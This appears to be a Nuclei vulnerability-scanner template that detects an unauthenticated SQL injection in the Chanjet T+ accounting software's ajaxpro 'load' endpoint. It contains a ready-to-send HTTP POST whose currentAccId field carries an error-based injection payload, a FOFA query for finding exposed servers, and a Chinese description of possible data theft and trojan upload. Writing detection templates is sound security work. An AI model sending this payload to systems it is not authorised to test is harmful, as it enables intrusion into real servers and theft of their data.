http:
    - matchers:
        - part: body
          type: word
          words:
            - 转换成数据类型 int 时失败
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
          Content-Type: application/json

          {"currentAccId":"2' and 1=@@version--+", "currentAcc":"1", "currentDsName":"1", "currentVersion":"1", "currentVersionNo":"1"}
id: changjietong-load-sql
info:
    author: Superhero
    description: |-
        fofa: app="畅捷通-TPlus"
        由于畅捷通T+的load接口处未对用户的输入进行过滤和校验，未经身份验证的攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 畅捷通T+ load SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/TNh7ERXSTAwP-t7UcBVGPw
    severity: high
    tags:
        - uIP
        - 畅捷通-TPlus
        - ajaxpro
